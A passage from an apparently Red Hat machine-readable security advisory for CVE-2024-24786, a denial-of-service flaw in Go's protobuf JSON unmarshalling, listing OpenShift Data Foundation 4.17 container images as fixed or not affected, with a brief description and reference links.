"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2268046", }, ], notes: [ { category: "description", text: "A flaw was found in Golang's protobuf module, where the unmarshal function can enter an infinite loop when processing certain invalid inputs. This issue occurs during unmarshaling into a message that includes a google.protobuf.Any or when the UnmarshalOptions.DiscardUnknown option is enabled. This flaw allows an attacker to craft malicious input tailored to trigger the identified flaw in the unmarshal function. By providing carefully constructed invalid inputs, they could potentially cause the function to enter an infinite loop, resulting in a denial of service condition or other unintended behaviors in the affected system.", title: "Vulnerability description", }, { category: "summary", text: "golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-24786", }, { category: "external", summary: "RHBZ#2268046", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2268046", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-24786", url: "https://www.cve.org/CVERecord?id=CVE-2024-24786", }, { category: "external", summary: 